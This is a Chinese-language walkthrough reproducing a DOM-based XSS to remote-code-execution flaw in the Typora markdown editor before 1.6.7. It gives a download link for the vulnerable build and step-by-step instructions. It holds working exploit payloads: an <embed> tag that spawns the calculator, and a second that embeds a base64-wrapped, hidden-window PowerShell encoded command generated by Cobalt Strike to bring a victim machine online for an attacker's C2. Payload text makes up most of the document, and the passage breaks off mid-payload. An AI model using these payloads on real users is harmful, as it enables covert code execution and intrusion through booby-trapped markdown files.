一、漏洞详情

Typora介绍

Typora 是一款由 Abner Lee 开发的轻量级 Markdown 编辑器，与其他 Markdown 编辑器不同的是，Typora 没有采用源代码和预览双栏显示的方式，而是采用所见即所得的编辑方式，实现了即时预览的功能，但也可切换至源代码编辑模式。

漏洞描述

Windows 和 Linux 版本 1.6.7 之前的 Typora 中的 updater/update.html 中存在基于 DOM 的 XSS，该漏洞允许通过加载特制的 markdown 文件从而使得执行任意 JavaScript 代码。如果用户打开恶意 markdown 文件或者从恶意网页复制文本并将其粘贴到 Typora，通过在＜embed＞标签中引用 update.html，则可以利用此漏洞，此外，攻击者可以使用特权接口 reqnode 访问节点模块 child_process 并执行任意系统命令。

影响范围

Typora < 1.6.7

二、环境下载

Typora 下载地址：https://pan.baidu.com/s/1ZOh6_5BzrtCcye95ulTYBg?pwd=qqw0
提取码：qqw0

点击 typora-setup-x64-1.5.12 进行安装。

选择 Install for all users (recommended) 为所有用户安装。

选择安装路径。

 默认下一步。

 点击 Install 进行安装。

完成安装。

三、漏洞利用

3.1、计算器弹出

复现版本

新建一个 md 文件。

打开 test.md。

快捷键 Ctrl + K 新建一个代码块。

将如下 Poc 粘贴到代码块中。

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

Base64解码：reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])

将代码语言设置为 HTML。

选中代码块全部内容， Ctrl + x 剪切，然后在 Ctrl + V 粘贴即可触发漏洞（注：不要粘贴到原有的代码块中，粘贴到其他空白地方）。

3.2、上线CS

 复现版本

打开 CS 生产 Powershell 命令。

 点击生成，这里我生成到桌面。

修改 POC。

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('Bse64加密'))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

Bse64解码：reqnode('child_process').exec(({Win32: 'CS生成的PowerShell命令', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])

最终 POC 为如下：

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ3Bvd2Vyc2hlbGwgLW5vcCAtdyBoaWRkZW4gLWVuY29kZWRjb21tYW5kIEpBQnpBRDBBVGdCbEFIY0FMUUJQQUdJQWFnQmxBR01BZEFBZ0FFa0FUd0F1QUUwQVpRQnRBRzhBY2dCNUFGTUFkQUJ5QUdVQVlRQnRBQ2dBTEFCYkFFTUFid0J1QUhZQVpRQnlBSFFBWFFBNkFEb0FSZ0J5QUc4QWJRQkNBR0VBY3dCbEFEWUFOQUJUQUhRQWNnQnBBRzRBWndBb0FDSUFTQUEwQUhNQVNRQkJBRUVBUVFCQkFFRUFRUUJCQUVFQUx3QTJBREVBVndCaEFEUUFLd0JwQUZNQWFBQnlBQ3NBTXdCUUFEQUFjZ0FyQUVRQVF3QktBRWNBYlFBeUFGQUFOQUJMQUZnQU1RQmlBRU1BV1FBMUFFTUFTd0JuQUc4QVdBQm9BRVVBVmdBckFETUFVUUEyQUZJQVZnQkZBRXNBVndCMEFIY0FTd0JWQUZBQVJBQnpBQ3NBWlFBNUFHSUFid0JRQUdJQU1BQTNBRkFBVkFCekFGUUFjZ0JNQUdJQVV3QmpBR01BY1FBMkFISUFNQUE0QURrQVlnQjVBRmdBWlFCc0FGVUFWUUJRQUdFQWF3QlNBSE1BVndCRkFEQUFPUUJyQUhvQVJRQlFBRXNBTUFCUkFFTUFWd0F6QUZBQVdnQmlBR29BU0FCNEFERUFNd0J6QUhjQWFRQm9BR0lBV2dBMEFIVUFNd0JRQUZrQWNnQmxBR1lBVHdCTUFFSUFUZ0F5QUVNQVlRQkNBRWtBVlFCb0FEZ0FPUUJtQUdvQWR3QjNBSGNBVVFBMEFFUUFSQUJHQUV3QWVRQmtBRUVBTXdCb0FIb0FVQUJxQUVRQVJ3QnhBRTBBVUFCckFHMEFSUUF3QUZJQWJRQlVBRVlBUkFCd0FEUUFaUUJJQUhnQVNRQm1BRGdBVlFCMUFIa0FTQUJaQUc4QVZBQmpBRmdBVWdCUUFGa0FTZ0IyQUZRQWF3QnZBSE1BYWdCM0FIb0FXZ0JNQURRQWVRQjRBRklBWmdCbEFEa0FNQUJZQUZBQVFRQmlBR0lBTndBckFIWUFkZ0IyQUZFQWF3QjNBRWtBWXdCeEFGQUFjZ0IyQUhRQWNBQklBRVVBVWdBckFFY0FlUUJFQUVjQWR3QnFBR01BU2dCcEFHa0FaZ0JyQUc0QWN3QTNBRmtBVVFCUkFGVUFPUUJVQURRQU5BQkNBR2NBZUFCUUFIb0FSZ0JtQUVnQWJRQnlBRGtBY2dCR0FHNEFRUUJJQUhjQVZBQlRBSGNBVlFCQkFFd0FXQUJ2QUV3QU13QnFBRmNBZWdCTkFEZ0FWd0JFQUVrQVRBQjBBRUlBVmdCbUFGY0FlQUJJQUZJQVZRQk1BR1lBTHdBMUFGb0FTd0JNQURBQU9BQnpBR0VBT1FCV0FFc0FXUUJuQUVJQVJBQnZBSE1BUmdCT0FGRUFNQUJxQURVQVJnQlNBRTRBYWdCQkFITUFiQUExQUhVQU9RQlRBRFVBYmdCREFGb0FLd0J4QUdnQVdRQkhBRTRBZFFCUkFHVUFTd0JIQURNQWFRQTJBSEFBY2dBeUFEWUFNUUI2QUZZQVV3QXhBRWdBVUFBNEFHNEFRZ0JxQURZQUx3QlpBRU1BTmdCWUFHSUFlZ0JtQUZrQUt3QnZBRkFBWmdBMEFDc0FVd0JWQUhvQWNRQXhBR1VBWkFCWkFHOEFSUUIxQUZvQU5RQlJBR0lBTHdCekFIQUFhQUJ2QUdNQVN3QTRBRm9BVUFBMUFHVUFXQUJzQUNzQVdnQlFBRGtBTndCU0FFd0FSd0JKQURNQWN3Qm9BREVBVlFCc0FHUUFNQUJKQUVVQVl3QTVBRmdBUlFCVUFHNEFXZ0JGQUVrQVdBQldBRUVBV0FCQ0FFNEFhZ0JDQUZvQWJ3QlNBRGtBVlFCTEFFa0FXUUF5QUZvQWRRQjVBQ3NBVlFCTEFFRUFhUUJEQUc4QWNBQnBBRFFBZWdCQ0FEQUFUQUF4QUZRQWRBQTFBRklBTVFCVUFEZ0FOQUJ6QUZrQVdRQldBRFlBYWdCa0FHd0FNUUFyQURFQUt3QXhBSEVBWXdCdkFGQUFUd0JrQURNQVJnQTVBRllBU3dCdUFEVUFWUUJ2QUd3QVN3QjZBR2tBU2dCUkFIRUFkQUExQUhvQU5BQkdBRlFBY2dCSEFHVUFaQUExQUdNQWVnQmtBRWdBY2dBdkFFa0FSQUFyQUZFQU13QkxBRllBTmdCT0FEZ0FVQUJEQUZZQVdnQTJBQzhBVUFCMUFIb0FWZ0JFQUZVQVVnQlNBRzRBY3dCUkFHOEFZZ0JsQUVrQU9BQjJBSE1BYUFCV0FIZ0FPQUJtQUVnQWJBQTNBSGtBU2dCaEFFd0FNd0JMQUdNQU5nQTRBREFBVFFBM0FERUFkZ0JxQUVzQU1RQkRBR29BVHdCdEFFa0FSUUJFQUdzQWF3QlVBRkVBVEFBMUFEVUFUQUJGQUhFQVVBQlVBRFlBVEFCVUFEVUFXQUIwQURNQVpnQk9BSE1BVUFCS0FGUUFVUUFyQUhnQVpBQTJBRFlBV2dCNkFFUUFZd0E0QUZZQWVBQXhBR1lBYlFCYUFHVUFXQUJhQURVQWRRQjJBR29BVVFBckFHNEFlQUJzQUdvQU13QmFBRGtBZWdCakFHb0FkQUJ5QUVjQVNnQlRBRWdBWWdBckFEZ0FNZ0J2QUZFQU1BQmpBRFVBTWdCckFGb0FhUUEyQUhjQVRBQklBR2dBVUFCbEFFY0FUQUJ1QURnQVZRQk5BRGNBVkFCRUFFc0FLd0JoQUdvQVpRQjRBRk1BV1FCVkFGb0FOd0JHQUhjQVR3QXdBRU1BYlFCbEFFY0FUd0J1QUdzQVFnQklBRFlBT0FCeEFFOEFZUUExQUU0QWFnQlNBSFVBTWdBM0FETUFRd0J2QURZQVNBQk9BRThBTkFCb0FGSUFWUUJXQUZRQWJ3QjJBRkVBT1FCdEFFY0Fjd0JOQUdrQWR3QllBRm9BU0FCVEFFOEFTQUE0QUc0QVpnQmtBREFBZWdCVUFEa0Fjd0J4QUU0QWJBQm9BSFVBTndCVEFIUUFPUUJLQUVzQU53QTVBRFlBZWdCbUFGb0FZZ0JNQUVFQVp3QmFBR2dBVndCSEFFWUFiUUJOQUdFQU1RQjZBRmNBUndCR0FGVUFRZ0JFQUVFQWVRQkxBSGNBZWdCMkFHZ0FkZ0JpQUhRQWFRQkpBRGdBYWdCTUFERUFPQUJYQUhZQWN3QkZBR1FBZUFCNkFHa0FlUUJKQUZFQWFRQnFBSFVBTndCdUFGZ0FNQUJwQUdVQVZRQXpBR3dBZHdCTUFHNEFhd0J6QUhJQVNnQnZBRmtBTUFCMUFIQUFVd0JIQUhBQVpRQnZBR29BWVFCQkFFOEFZd0J6QUZZQVNnQm9BRUlBY2dCaEFFb0FkUUJ4QUd3QWNRQTNBQ3NBT0FCUkFFTUFjQUE1QUhrQVNRQm5BRU1BVFFCaEFHTUFiQUJTQUZNQWVRQmpBR0VBUlFBdkFHOEFiQUEwQURBQVN3Qk9BSE1BY0FCM0FHZ0FXZ0IxQUZnQVpnQTRBRFlBVGdCVkFGWUFWZ0JGQUdzQVR3QjZBRFVBUndCRUFIQUFXQUJQQUhVQU1RQkJBRkFBWndCNkFETUFkQUJQQUdJQVpRQkxBSGtBZEFCTkFFNEFOd0JLQUVZQVdnQXJBRUVBS3dCM0FEY0FNd0JXQUhrQVRBQlpBSEVBVFFCeEFIb0FkQUJLQUVnQU1BQkVBRlFBUWdCR0FFTUFlQUJHQURFQVZ3QlpBR3dBVlFBd0FHa0FNZ0IwQUdNQVN3QnNBRklBT0FCVEFEY0FNd0FyQUVRQU9RQXpBRElBVEFBckFGRUFOZ0J0QUZFQVRnQkJBSFFBYXdCTkFGY0FPQUJGQUU4QVZRQmtBR0lBWlFCcUFGZ0FUQUJyQUVRQVdnQkRBR1VBTUFCTUFHSUFZd0JaQUc4QVdRQk9BSEVBYkFCeUFFRUFVZ0JtQUhVQWJRQnRBRlVBTVFCV0FFb0FkUUJDQUcwQVlnQlFBSG9BWkFCa0FETUFid0J1QUU0QVlRQlRBRlVBVXdCV0FHVUFjd0JTQUhvQWRRQnBBRUlBUlFCeUFGa0FZUUJoQURrQU53Qm9BR2tBYndCakFEY0FSZ0FyQURZQVVRQjZBRlVBTVFCeUFIQUFLd0JEQUVJQWVnQjNBREVBVWdBekFFb0Fkd0JzQURBQVZnQXdBRkVBTmdBNUFHWUFjUUJuQUZvQVV3QldBSG9BVEFCMkFHSUFad0JOQUdrQVRBQkNBRkVBUWdCTUFIQUFaZ0JuQUVjQU5RQk5BRTBBVWdBNUFEY0FRZ0IxQUZjQVJRQnZBRUlBUlFCUEFGSUFlUUJUQUdvQWNnQkNBRW9BY0FCU0FHNEFVQUJMQUZnQVlnQk1BR0lBZEFCd0FIa0FjZ0JJQUZFQWRnQmlBSE1BS3dCSEFFUUFkQUJYQUdJQVZBQjZBREVBT1FBd0FGTUFTQUI1QUdFQVpBQk1BSG9BWXdCUUFHY0FPQUJGQUc0QWNBQnlBRVFBWkFCcEFFZ0FTUUJRQUdNQVZnQlBBSGNBTXdCWEFHd0FSUUJEQUhFQVdBQkhBRVFBVEFCSkFHd0FUUUJQQUdVQVpnQndBRFVBUlFCekFHa0FiZ0JIQUZjQUt3QjFBRlFBTndCRUFHd0FhZ0JNQUhnQVpRQkxBRFlBU3dBMkFIRUFNUUJwQUVzQVpnQlRBRXdBUmdBd0FEVUFhd0JsQUVzQU5BQklBR2tBZVFCSUFHSUFSQUJQQUc4QWJRQnlBR0VBU0FCcEFGTUFLd0FyQURNQVFnQnBBRTRBVGdCQ0FFY0FlQUIyQUZBQVN3Qk9BR01BTXdCbkFEZ0FlUUJZQUVnQWRRQjRBRkFBU1FCT0FIUUFaZ0JQQUhRQWJnQmxBRVFBWndCU0FFVUFUUUJxQURnQU5nQmFBRklBTHdCV0FESUFVZ0JhQUdFQVJBQTFBRGtBTVFBeEFEY0FaZ0JTQUU4QWRBQTFBR1lBZWdCb0FFMEFZZ0J0QUdnQVl3QlNBR01BVlFCUUFEWUFVQUJtQUdJQVJ3QXdBRUVBTHdCeUFHc0Fkd0IyQUdNQVNBQlpBRGdBU0FBMEFFd0FUd0JoQUdVQWJRQlNBRWdBVXdBeUFESUFOd0J2QUdRQWVRQjNBRWtBUXdCQkFEa0Fid0F3QUZZQVZRQXpBR01BWlFCdUFFWUFZUUE0QUdRQU5nQTNBRTBBZEFCNUFHSUFSd0JrQUdVQWFBQlVBR29BU2dCTkFFNEFjQUJSQURJQU5RQTBBREFBWmdBekFHb0FNUUJzQUhjQVJnQlZBRzRBTVFCdEFIa0FUZ0J2QUVFQWF3QjVBRUVBWlFBeUFHc0FOUUEyQUd3QWRRQlVBREFBU2dCMUFFMEFUUUJWQURFQVdBQjBBREFBZEFBdkFGSUFNUUJvQUhjQVJnQTNBR0VBV2dBMUFEUUFaQUJMQUVJQU13QjNBRUVBZEFCWkFHd0FUZ0JQQUVVQUt3QnlBRzRBVHdCbEFFMEFXQUJoQUhVQVJnQkNBRmdBYXdBNUFHUUFkUUJQQUc0QVdnQkVBSElBVVFBMEFHTUFXQUJIQUVFQVNBQlRBR01BVHdCdEFHZ0FVZ0F6QUZrQWVnQkJBRm9BYWdCcUFGa0FTZ0JEQUdFQVNRQm9BRU1BVlFBMEFEUUFZUUJGQURVQWJnQk5BRTBBVHdCa0FEWUFNZ0JZQUhrQU9BQjNBR0VBWlFCekFHd0FVUUFyQUUwQVFRQTNBRXNBUXdCS0FGSUFiQUJsQURNQWR3QkJBRzRBVlFCMUFHOEFhZ0JPQUVFQWNBQlhBRFlBWXdCNkFHTUFXZ0JUQUdzQU9BQnJBRVlBZFFCNEFEa0FNUUJOQUZRQU5RQlVBRmtBY2dCekFFZ0FTZ0JvQUhnQU1nQlFBRm9BTHdCUEFHUUFNQUJzQUhrQVN3QmFBRFVBWXdCWkFGUUFZUUJxQUdjQVNnQnFBSFFBWXdCNkFFMEFLd0E0QUdFQVlnQkRBR0lBZFFCTEFGY0FkUUJPQURZQVNRQXlBR2dBUmdCdkFHNEFXUUJrQUdRQWNnQk5BRzBBWndBMUFGUUFZd0F2QUZNQVJnQnZBRzBBVndCT0FITUFjQUJ3QUVvQU13QkRBRzRBTkFCMEFHc0FZd0IzQUhJQVN3Qm5BR2NBUmdCR0FGVUFNZ0E1QUVjQVZ3QlNBRmdBV2dBNUFIY0FaZ0J6QUhRQVdnQnJBQ3NBT0FBeUFISUFTQUJ5QUZZQWJnQktBRmtBY0FCU0FFNEFUd0JyQURjQVdRQk1BREFBVWdCc0FFc0FhUUI1QUU4QU53QTJBR01BT0FCdUFEZ0FZZ0JMQUVnQVVnQTRBSFFBWVFCU0FIZ0FRd0EzQUdNQVF3QkxBR1FBZUFBNEFIQUFZd0JUQUhFQVdnQmhBR0lBWWdCb0FGSUFhZ0EzQURNQVdnQjNBSFFBY1FCTUFHZ0FkQUJ6QUU0QWRBQjJBSFVBZUFCSkFGTUFOd0JIQUU4QWJBQTVBR1lBTUFCSUFHa0FXUUEwQURFQVZ3QlFBRVlBTkFBd0FFNEFSZ0JJQUhZQU53QnRBSFFBY2dCdUFFb0FNd0JXQUU0QU9BQjNBR1VBV2dCMkFHUUFlQUJIQUhNQWFBQm1BRUlBYXdCbEFEQUFkQUJDQUhnQVRnQm9BRllBVVFCekFHNEFNQUJ0QUVrQWRnQnBBRzBBZGdCWEFFMEFVZ0JPQURZQWVBQjJBRVVBTmdCbUFESUFZUUJxQUV3QVZ3QldBRllBV0FCRkFIY0FZd0IzQUZjQU53QTBBR01BY2dCMkFHSUFaQUJuQUNzQVJBQlNBR3NBY2dCdUFHZ0FjZ0JIQUhnQWJnQjJBRzhBZWdCUkFGSUFPUUJsQUZvQWRRQnNBSGtBTUFBckFESUFZd0J6QUdFQU13QXZBR1FBZFFBMUFFOEFWZ0I0QUVvQWJnQktBRTBBWkFCbkFIY0FNUUIxQUhRQVp3QTRBRlVBWlFCNUFHTUFlQUJwQUd3QU9BQk9BRzhBVUFCcEFFb0FlUUF3QUd3QU1RQlFBRGtBV0FCV0FHb0FjQUJGQURZQU1nQTNBRk1BYXdCTkFFb0Fid0JtQUU4QVZ3Qk9BR01BV0FBMEFIRUFTd0E1QUZZQVZnQlNBR2dBY3dCT0FEY0FNUUF3QURJQWF3QjVBR0lBT0FCc0FEY0FWZ0J0QURZQU13QXJBR29BV1FBdkFHd0FhZ0IxQUdNQVdRQllBRW9BUXdBckFDOEFiQUJwQUVRQVZRQmtBRmNBWXdBNUFEa0FTQUJyQUhJQVNnQmpBRkVBTXdCVkFIUUFRd0J1QURBQVRnQnRBRTBBTVFCMUFHa0Fhd0JvQUdZQU5BQjVBRVlBZHdCR0FERUFTUUJFQUVzQVFnQmlBR1lBV0FCQkFHUUFRd0JQQUZZQVJBQTVBRzBBUmdBeEFFMEFSUUJWQURRQWRBQldBR1FBVEFCVkFEQUFOd0JVQUdRQU1BQm5BRllBZHdCUEFHTUFMd0JMQUVzQU5nQTBBRzBBYlFBdkFFTUFlUUJVQUVvQVZnQnJBRzhBTkFCSUFDc0FhUUJqQUdRQU5BQmFBRFFBUXdCWEFFZ0FNZ0JyQUhJQWFnQlRBR29BTVFCU0FGZ0FZd0I1QUhRQU13QlJBR3NBWndCUUFFVUFad0JRQUVzQWVRQkdBRWNBZFFBMkFIa0FOUUJWQUVjQU1BQjJBSFVBZHdCMUFIZ0FlUUF4QUdZQVVnQndBRFlBTWdCR0FHUUFNd0JYQUNzQVlRQkVBRGNBT1FCVEFGZ0FNZ0JsQUhVQWR3QXhBSEFBTkFCTkFIUUFlZ0JXQUZZQVlRQnZBSGtBVGdCRUFIWUFiUUJUQURFQVR3Qm5BRW9BTmdCWUFISUFUd0JxQUV3QVZ3QnhBRmtBTlFCNUFGTUFOZ0JqQUU4QVF3QTFBR1VBTkFCaUFEa0FUd0JGQUdvQWJ3Qm1BRFFBTXdCdEFGb0FTQUJzQUU0QVdnQmpBQ3NBV2dCVUFFSUFRZ0IzQUU0QVN3QTRBSEFBYWdBNEFFY0FXZ0ExQUdvQVZnQnZBR2tBVXdBM0FHWUFUUUJuQURZQWNnQTFBSEVBYndCWUFFTUFRUUJ6QUdrQWVBQjNBRXNBZEFCbEFEWUFUd0JIQURZQWRBQkZBSG9BVXdCUUFGY0FSQUJVQUU4QU13QkRBSE1BY1FCcEFHTUFTZ0J6QUNzQWR3QXpBSEFBVndCQ0FFNEFTd0FyQUhBQWRnQlJBRmNBVGdBeUFHSUFOQUJIQUhFQVF3QXhBRmNBTXdCckFHd0FaZ0E0QUhvQVlRQTFBRGdBZHdCcEFHUUFaZ0JLQUVvQWN3QnRBSFlBWndCSUFGRUFNd0FyQUdZQVl3Qk5BRk1BT0FCT0FIb0FkZ0JoQURRQWJRQm9BSElBZWdCaUFEWUFXQUI1QURNQWF3QTNBR1lBU0FCbkFDOEFaUUIyQUcwQVV3QjJBRTRBTlFCSUFIa0FVQUJtQURrQWF3QTFBRVlBVVFCakFDOEFXQUJ0QURRQU9BQlFBR1lBT1FBeEFHNEFhQUJDQUVRQU5RQXdBSG9BU2dBNUFFNEFXZ0J0QUU0QVFRQlJBR2NBZEFCbkFESUFhd0J1QUhBQVpBQklBRllBTHdCSEFETUFjd0JsQURZQVpBQXhBRzBBY0FCS0FHd0FiZ0JhQUhnQWNnQkdBRFFBZFFCa0FHb0FMd0JTQUVVQVVnQkdBRElBUlFBMkFEZ0FkQUJMQUdnQUt3QlFBRFlBYVFBd0FFZ0FRZ0ExQUUwQVNnQjJBSEVBWmdCcUFFb0FaUUF2QUdZQVNBQmxBRGdBS3dCdUFFd0FjUUJrQUVZQWJBQnVBR1lBZEFBd0FGWUFaZ0J5QURJQVR3QktBRklBU3dBNUFESUFaZ0JRQUdrQVNBQmxBRGNBWmdCUUFGTUFOUUJZQUdZQVJRQXJBRUVBV0FBMUFEY0FVZ0J5QUdJQU1BQm1BSEFBVlFCUUFGSUFRd0J5QUVrQU13QlZBR1FBVndCb0FHRUFhd0JzQURrQVZnQnhBSFFBYkFCMkFEQUFNZ0JoQUhRQVZBQmhBSElBZUFCTkFHb0FaUUJJQURVQVlRQm1BRXdBWkFCWUFIa0FWd0JoQUM4QVJBQXhBRUVBS3dCMUFITUFTd0ExQUhFQUx3QmtBR2dBYWdCakFGTUFkUUJuQUM4QU5nQlFBRTBBWmdCcUFFOEFOZ0F6QURrQWJnQk9BQ3NBVFFCMkFHNEFlQUFyQUM4QWN3QmFBR01BYWdBckFIQUFlUUI1QURjQVJRQklBQ3NBUmdBNEFFY0FSQUJzQUhJQVVBQm1BRVFBVVFCQkFFRUFJZ0FwQUNrQU93QkpBRVVBV0FBZ0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUVrQVR3QXVBRk1BZEFCeUFHVUFZUUJ0QUZJQVpRQmhBR1FBWlFCeUFDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUVrQVR3QXVBRU1BYndCdEFIQUFjZ0JsQUhNQWN3QnBBRzhBYmdBdUFFY0FlZ0JwQUhBQVV3QjBBSElBWlFCaEFHMEFLQUFrQUhNQUxBQmJBRWtBVHdBdUFFTUFid0J0QUhBQWNnQmxBSE1BY3dCcEFHOEFiZ0F1QUVNQWJ3QnRBSEFBY2dCbEFITUFjd0JwQUc4QWJnQk5BRzhBWkFCbEFGMEFPZ0E2QUVRQVpRQmpBRzhBYlFCd0FISUFaUUJ6QUhNQUtRQXBBQ2tBTGdCU0FHVUFZUUJrQUZRQWJ3QkZBRzRBWkFBb0FDa0FPd0E9JywgTGludXg6ICdnbm9tZS1jYWxjdWxhdG9yIC1lICJUeXBvcmEgUkNFIFBvQyInfSlbbmF2aWdhdG9yLnBsYXRmb3JtLnN1YnN0cigwLDUpXSk='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

新建一个 md 文件。

打开 test.md。

 快捷键 Ctrl + K 新建一个代码块。

 将刚刚修改后的 POC 粘贴到代码块中，并将代码语言修改为 HTML。

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ3Bvd2Vyc2hlbGwgLW5vcCAtdyBoaWRkZW4gLWVuY29kZWRjb21tYW5kIEpBQnpBRDBBVGdCbEFIY0FMUUJQQUdJQWFnQmxBR01BZEFBZ0FFa0FUd0F1QUUwQVpRQnRBRzhBY2dCNUFGTUFkQUJ5QUdVQVlRQnRBQ2dBTEFCYkFFTUFid0J1QUhZQVpRQnlBSFFBWFFBNkFEb0FSZ0J5QUc4QWJRQkNBR0VBY3dCbEFEWUFOQUJUQUhRQWNnQnBBRzRBWndBb0FDSUFTQUEwQUhNQVNRQkJBRUVBUVFCQkFFRUFRUUJCQUVFQUx3QTJBREVBVndCaEFEUUFLd0JwQUZNQWFBQnlBQ3NBTXdCUUFEQUFjZ0FyQUVRQVF3QktBRWNBYlFBeUFGQUFOQUJMQUZnQU1RQmlBRU1BV1FBMUFFTUFTd0JuQUc4QVdBQm9BRVVBVmdBckFETUFVUUEyQUZJQVZnQkZBRXNBVndCMEFIY0FTd0JWQUZBQVJBQnpBQ3NBWlFBNUFHSUFid0JRQUdJQU1BQTNBRkFBVkFCekFGUUFjZ0JNQUdJQVV3QmpBR01BY1FBMkFISUFNQUE0QURrQVlnQjVBRmdBWlFCc0FGVUFWUUJRQUdFQWF3QlNBSE1BVndCRkFEQUFPUUJyQUhvQVJRQlFBRXNBTUFCUkFFTUFWd0F6QUZBQVdnQmlBR29BU0FCNEFERUFNd0J6QUhjQWFRQm9BR0lBV2dBMEFIVUFNd0JRQUZrQWNnQmxBR1lBVHdCTUFFSUFUZ0F5QUVNQVlRQkNBRWtBVlFCb0FEZ0FPUUJtQUdvQWR3QjNBSGNBVVFBMEFFUUFSQUJHQUV3QWVRQmtBRUVBTXdCb0FIb0FVQUJxQUVRQVJ3QnhBRTBBVUFCckFHMEFSUUF3QUZJQWJRQlVBRVlBUkFCd0FEUUFaUUJJQUhnQVNRQm1BRGdBVlFCMUFIa0FTQUJaQUc4QVZBQmpBRmdBVWdCUUFGa0FTZ0IyQUZRQWF3QnZBSE1BYWdCM0FIb0FXZ0JNQURRQWVRQjRBRklBWmdCbEFEa0FNQUJZQUZBQVFRQmlBR0lBTndBckFIWUFkZ0IyQUZFQWF3QjNBRWtBWXdCeEFGQUFjZ0IyQUhRQWNBQklBRVVBVWdBckFFY0FlUUJFQUVjQWR3QnFBR01BU2dCcEFHa0FaZ0JyQUc0QWN3QTNBRmtBVVFCUkFGVUFPUUJVQURRQU5BQkNBR2NBZUFCUUFIb0FSZ0JtQUVnQWJRQnlBRGtBY2dCR0FHNEFRUUJJQUhjQVZBQlRBSGNBVlFCQkFFd0FXQUJ2QUV3QU13QnFBRmNBZWdCTkFEZ0FWd0JFQUVrQVRBQjBBRUlBVmdCbUFGY0FlQUJJQUZJQVZRQk1BR1lBTHdBMUFGb0FTd0JNQURBQU9BQnpBR0VBT1FCV0FFc0FXUUJuQUVJQVJBQnZBSE1BUmdCT0FGRUFNQUJxQURVQVJnQlNBRTRBYWdCQkFITUFiQUExQUhVQU9RQlRBRFVBYmdCREFGb0FLd0J4QUdnQVdRQkhBRTRBZFFCUkFHVUFTd0JIQURNQWFRQTJBSEFBY2dBeUFEWUFNUUI2QUZZQVV3QXhBRWdBVUFBNEFHNEFRZ0JxQURZQUx3QlpBRU1BTmdCWUFHSUFlZ0JtQUZrQUt3QnZBRkFBWmdBMEFDc0FVd0JWQUhvQWNRQXhBR1VBWkFCWkFHOEFSUUIxQUZvQU5RQlJBR0lBTHdCekFIQUFhQUJ2QUdNQVN3QTRBRm9BVUFBMUFHVUFXQUJzQUNzQVdnQlFBRGtBTndCU0FFd0FSd0JKQURNQWN3Qm9BREVBVlFCc0FHUUFNQUJKQUVVQVl3QTVBRmdBUlFCVUFHNEFXZ0JGQUVrQVdBQldBRUVBV0FCQ0FFNEFhZ0JDQUZvQWJ3QlNBRGtBVlFCTEFFa0FXUUF5QUZvQWRRQjVBQ3NBVlFCTEFFRUFhUUJEQUc4QWNBQnBBRFFBZWdCQ0FEQUFUQUF4QUZRQWRBQTFBRklBTVFCVUFEZ0FOQUJ6QUZrQVdRQldBRFlBYWdCa0FHd0FNUUFyQURFQUt3QXhBSEVBWXdCdkFGQUFUd0JrQURNQVJnQTVBRllBU3dCdUFEVUFWUUJ2QUd3QVN3QjZBR2tBU2dCUkFIRUFkQUExQUhvQU5BQkdBRlFBY2dCSEFHVUFaQUExQUdNQWVnQmtBRWdBY2dBdkFFa0FSQUFyQUZFQU13QkxBRllBTmdCT0FEZ0FVQUJEQUZZQVdnQTJBQzhBVUFCMUFIb0FWZ0JFQUZVQVVnQlNBRzRBY3dCUkFHOEFZZ0JsQUVrQU9BQjJBSE1BYUFCV0FIZ0FPQUJtQUVnQWJBQTNBSGtBU2dCaEFFd0FNd0JMQUdNQU5nQTRBREFBVFFBM0FERUFkZ0JxQUVzQU1RQkRBR29BVHdCdEFFa0FSUUJFQUdzQWF3QlVBRkVBVEFBMUFEVUFUQUJGQUhFQVVBQlVBRFlBVEFCVUFEVUFXQUIwQURNQVpnQk9BSE1BVUFCS0FGUUFVUUFyQUhnQVpBQTJBRFlBV2dCNkFFUUFZd0E0QUZZQWVBQXhBR1lBYlFCYUFHVUFXQUJhQURVQWRRQjJBR29BVVFBckFHNEFlQUJzQUdvQU13QmFBRGtBZWdCakFHb0FkQUJ5QUVjQVNnQlRBRWdBWWdBckFEZ0FNZ0J2QUZFQU1BQmpBRFVBTWdCckFGb0FhUUEyQUhjQVRBQklBR2dBVUFCbEFFY0FUQUJ1QURnQVZRQk5BRGNBVkFCRUFFc0FLd0JoQUdvQVpRQjRBRk1BV1FCVkFGb0FOd0JHQUhjQVR3QXdBRU1BYlFCbEFFY0FUd0J1QUdzQVFnQklBRFlBT0FCeEFFOEFZUUExQUU0QWFnQlNBSFVBTWdBM0FETUFRd0J2QURZQVNBQk9BRThBTkFCb0FGSUFWUUJXQUZRQWJ3QjJBRkVBT1FCdEFFY0Fjd0JOQUdrQWR3QllBRm9BU0FCVEFFOEFTQUE0QUc0QVpnQmtBREFBZWdCVUFEa0Fjd0J4QUU0QWJBQm9BSFVBTndCVEFIUUFPUUJLQUVzQU53QTVBRFlBZWdCbUFGb0FZZ0JNQUVFQVp3QmFBR2dBVndCSEFFWUFiUUJOQUdFQU1RQjZBRmNBUndCR0FGVUFRZ0JFQUVFQWVRQk